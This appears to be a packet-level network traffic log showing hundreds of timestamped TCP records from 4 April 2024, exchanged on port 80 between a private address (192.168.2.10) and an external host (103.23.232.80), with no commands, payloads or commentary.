Apr 4, 2024 17:49:07.566911936 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566927910 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566931963 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566951036 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566951036 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.566967964 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566988945 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.566994905 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567028999 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.567096949 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567131042 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.567142963 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567156076 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567168951 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567177057 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.567202091 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.567229986 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567261934 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567265987 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.567298889 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.567305088 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567318916 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567331076 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567349911 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.567367077 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567373991 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.567390919 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567397118 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.567429066 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.567456007 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567487001 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567488909 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.567516088 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.567539930 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567553043 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567564964 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567593098 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567611933 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.567621946 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.567641973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567655087 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567687035 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.567698956 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567713022 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567724943 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567730904 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.567754984 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.567759037 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567781925 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567786932 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.567809105 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.567837000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567869902 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.567899942 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567913055 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567938089 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567940950 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.567965031 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.567971945 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.567995071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568003893 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.568032980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568064928 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.568080902 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568094015 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568123102 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.568129063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568152905 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568165064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568185091 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568187952 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.568206072 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.568231106 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.568254948 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568269014 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568310022 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568329096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568330050 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.568348885 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.568351984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568371058 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.568387985 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568397045 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.568403006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568427086 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568428040 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.568449974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568461895 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568485975 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.568511963 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.568522930 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568535089 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568552971 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.568557024 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568577051 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.568581104 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568593979 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.568609953 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.568638086 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568650961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568666935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568717003 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.568733931 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568747044 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568782091 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.568785906 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568799973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568823099 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568830013 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.568896055 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.568896055 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.568969965 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569004059 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.569016933 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569046021 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569057941 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569077969 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569078922 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.569093943 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.569116116 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.569124937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569148064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569159031 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569180012 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.569185019 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569201946 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.569225073 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.569272041 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569286108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569298983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569303036 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.569329023 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.569334030 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569359064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569363117 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.569386005 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.569390059 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569412947 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569442987 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.569482088 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569495916 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569526911 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.569539070 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569577932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569591045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569591999 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.569622040 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.569633961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569647074 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569667101 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.569672108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569684982 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569705963 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.569726944 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.569753885 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569766045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569777966 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569785118 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.569791079 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569808960 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.569816113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569832087 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.569859028 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569859982 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.569889069 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.569901943 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569915056 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569927931 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569950104 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.569972992 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.569978952 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.569991112 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570010900 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570014954 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570029974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570030928 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570048094 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570055008 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570064068 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570081949 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570096970 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570127010 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570127010 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570163012 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570172071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570194960 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570211887 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570226908 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570247889 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570255041 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570290089 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570295095 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570308924 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570327997 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570364952 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570369005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570393085 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570420980 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570451975 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570472002 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570483923 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570508957 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570538044 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570550919 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570564032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570594072 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570610046 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570620060 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570624113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570636988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570645094 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570669889 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570669889 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570693016 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570702076 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570727110 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570730925 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570758104 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570768118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570791960 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570797920 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570826054 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570858955 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570867062 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570928097 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570940018 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570960999 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570971966 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.570977926 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.570996046 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571001053 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571029902 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571029902 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571063042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571067095 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571078062 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571103096 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571120977 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571126938 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571147919 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571154118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571166992 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571183920 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571207047 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571207047 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571230888 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571255922 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571264982 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571294069 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571310997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571340084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571352005 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571368933 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571398973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571400881 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571444988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571474075 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571485043 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571497917 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571518898 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571531057 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571540117 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571566105 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571592093 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571594954 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571624041 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571640968 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571654081 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571677923 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571686983 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571698904 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571711063 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571722984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571733952 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571748972 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571757078 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571779013 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571788073 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571799994 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571809053 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571860075 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571872950 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571896076 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571907043 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571918011 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571938038 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571943045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571957111 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.571986914 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.571999073 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572050095 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572062969 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572082996 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.572086096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572099924 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.572122097 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572141886 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.572144032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572158098 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.572169065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572177887 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.572194099 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.572243929 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572257042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572268963 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572288036 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.572304964 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572310925 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.572330952 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572341919 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.572359085 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.572376013 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572407007 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.572424889 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572464943 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572484970 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572505951 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.572524071 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.572535038 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572546959 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572576046 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.572622061 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572644949 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572668076 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.572674990 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572683096 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.572705030 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.572719097 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572751045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572763920 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.572779894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.572799921 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.572813034 CEST	49730	80	192.168.2.10	103.23.232.80
